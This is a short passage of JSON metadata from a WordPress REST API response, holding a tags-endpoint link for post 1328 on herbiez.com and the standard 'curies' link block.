/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1328"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}